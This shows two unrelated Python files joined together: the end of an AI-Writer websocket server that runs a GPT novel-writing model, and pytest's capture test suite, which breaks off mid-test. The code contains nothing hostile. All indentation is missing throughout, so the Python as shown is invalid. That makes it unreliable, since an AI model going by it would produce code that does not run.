if msg['op'].lower() == 'get':
# if _DEBUG_LEVEL_ > 0:
# print('get', websocket.client_id, msg['txt'])
queueZ.put((websocket.client_id, msg['txt']))
except Exception as e:
print(e)
pass
async def consumer_handler(websocket, path):
while True:
msg = await websocket.recv()
await consumer(websocket, msg)
async def server(websocket, path):
websocket.client_id = '%020x' % random.randrange(16**20)
USERS.add(websocket)
print("[ws connect]", len(USERS), 'users @',
time.strftime("%Y %b %d %H:%M:%S", time.localtime(time.time())))
try:
await websocket.send('id_' + websocket.client_id)
consumer_task = asyncio.ensure_future(
consumer_handler(websocket, path))
producer_task = asyncio.ensure_future(
producer_handler(websocket, path))
done, pending = await asyncio.wait(
[consumer_task, producer_task],
return_when=asyncio.FIRST_COMPLETED)
for task in pending:
task.cancel()
finally:
USERS.remove(websocket)
print("[ws disconnect]", len(USERS))
def srv_exception(loop, context):
if _DEBUG_LEVEL_ > 1:
print('exception', loop, context)
pass
try:
start_server = websockets.serve(server, "127.0.0.1", PORT_NUM)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().set_exception_handler(srv_exception)
asyncio.get_event_loop().run_forever()
except Exception as e:
print('[srv error]', e)
def NeuralWorker(queueZ, queueX):
from multiprocessing import Process, RawArray, freeze_support, Queue, Lock
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
import src.utils
from src.model import GPT, GPTConfig
# src.utils.set_seed(42) # 是否固定随机数(固定后每次运行的生成结果都一样)
print('\nAI人工智障写作 https://github.com/BlinkDL/AI-Writer')
print('请关注我的知乎 https://zhuanlan.zhihu.com/p/394766831')
print('\n声明:模型的训练数据全部来自网文,缺乏生活常识。生成的文字仅供娱乐。请遵守法律法规。')
print(f'\nLoading model for {RUN_DEVICE}...', end=' ')
with open(WORD_NAME + '.json', "r", encoding="utf-16") as result_file:
word_table = json.load(result_file)
vocab_size = len(word_table)
def train_dataset(): return None
train_dataset.stoi = {v: int(k) for k, v in word_table.items()}
train_dataset.itos = {int(k): v for k, v in word_table.items()}
UNKNOWN_CHAR = train_dataset.stoi['\ue083']
if RUN_DEVICE == 'dml':
import onnxruntime as rt
sess_options = rt.SessionOptions()
sess_options.graph_optimization_level = rt.GraphOptimizationLevel.ORT_ENABLE_ALL
sess_options.execution_mode = rt.ExecutionMode.ORT_SEQUENTIAL
sess_options.enable_mem_pattern = False
rt_session = rt.InferenceSession(MODEL_NAME + '.onnx', sess_options=sess_options, providers=['DmlExecutionProvider'])
rt_session.set_providers(['DmlExecutionProvider'])
else:
model = GPT(GPTConfig(vocab_size, ctx_len, n_layer=n_layer, n_head=n_head, n_embd=n_embd, n_attn=n_attn, n_ffn=n_ffn))
m2 = torch.load(MODEL_NAME + '.pth', map_location='cpu').state_dict()
for i in range(n_layer):
prefix = f'blocks.{i}.attn.'
time_w = m2[prefix + 'time_w']
time_alpha = m2[prefix + 'time_alpha']
time_beta = m2[prefix + 'time_beta']
mask = m2[prefix + 'mask']
TT = ctx_len
T = ctx_len
w = F.pad(time_w, (0, TT))
w = torch.tile(w, [TT])
w = w[:, :-TT].reshape(-1, TT, 2 * TT - 1)
w = w[:, :, TT-1:]
w = w[:, :T, :T] * time_alpha[:, :, :T] * time_beta[:, :T, :]
w = w.masked_fill(mask[:T, :T] == 0, 0)
m2[prefix + 'time_ww'] = w
del m2[prefix + 'time_w']
del m2[prefix + 'time_alpha']
del m2[prefix + 'time_beta']
del m2[prefix + 'mask']
if RUN_DEVICE == 'gpu':
model = model.cuda()
model.load_state_dict(m2)
print('done:', MODEL_NAME, '&', WORD_NAME)
while True:
K, Z = queueZ.get()
# print('neural task', K, Z)
ttt = time.time()
context = Z
context = context.strip().split('\n')
for c in range(len(context)):
context[c] = context[c].strip().strip('\u3000').strip('\r')
context = list(filter(lambda c: c != '', context))
context = '\n' + ('\n'.join(context)).strip()
# print('您输入的开头有 ' + str(len(context)) +
# ' 个字。注意,模型只会看最后 ' + str(ctx_len) + ' 个字。')
NUM_OF_RUNS = 1
for run in range(NUM_OF_RUNS):
x = np.array([train_dataset.stoi.get(s, UNKNOWN_CHAR)
for s in context], dtype=np.int64)
real_len = len(x)
print_begin = 0
out_txt = ''
for i in range(LENGTH_OF_EACH):
if i == 0:
print_begin = real_len
with torch.no_grad():
if RUN_DEVICE == 'dml':
if real_len < ctx_len:
xxx = np.pad(x, (0, ctx_len - real_len))
else:
xxx = x
out = rt_session.run(None, {rt_session.get_inputs()[0].name: [xxx[-ctx_len:]]})
out = torch.tensor(out[0])
else:
xxx = torch.tensor(x[-ctx_len:], dtype=torch.long)[None,...]
if RUN_DEVICE == 'gpu':
xxx = xxx.cuda()
out, _ = model(xxx)
out[:, :, UNKNOWN_CHAR] = -float('Inf')
pos = -1 if real_len >= ctx_len else real_len - 1
if train_dataset.itos[int(x[real_len-1])] == '\n':
char = src.utils.sample_logits(
out, pos, temperature=1.0, top_p=0.995)
else:
char = src.utils.sample_logits(
out, pos, temperature=1.0, min_p_pow=2.0, min_p_ratio=min_p_ratio)
x = np.append(x, char)
real_len += 1
completion = ''.join([train_dataset.itos[int(i)]
for i in x[print_begin:real_len]])
out_txt += completion
print_begin = real_len
outmsg = {}
outmsg['op'] = 'TXT'
outmsg['txt'] = out_txt
queueX.put((K, json.dumps(outmsg, separators=(',', ':'))))
# if _DEBUG_LEVEL_ > 1:
# print(time.time() - ttt, end=' ')
ttt = time.time()
if _DEBUG_LEVEL_ > 1:
print(context, end = '')
print(out_txt + '\n' + ('=' * 20))
if __name__ == "__main__":
main()
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import Generator
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
def TeeStdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.TeeSysCapture)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestCaptureAndPassthroughIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
iter_f = iter(f)
pytest.raises(IOError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd=<UNSET> _state='done' tmpfile={!r}>".format(
cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
""" for TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n" """
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
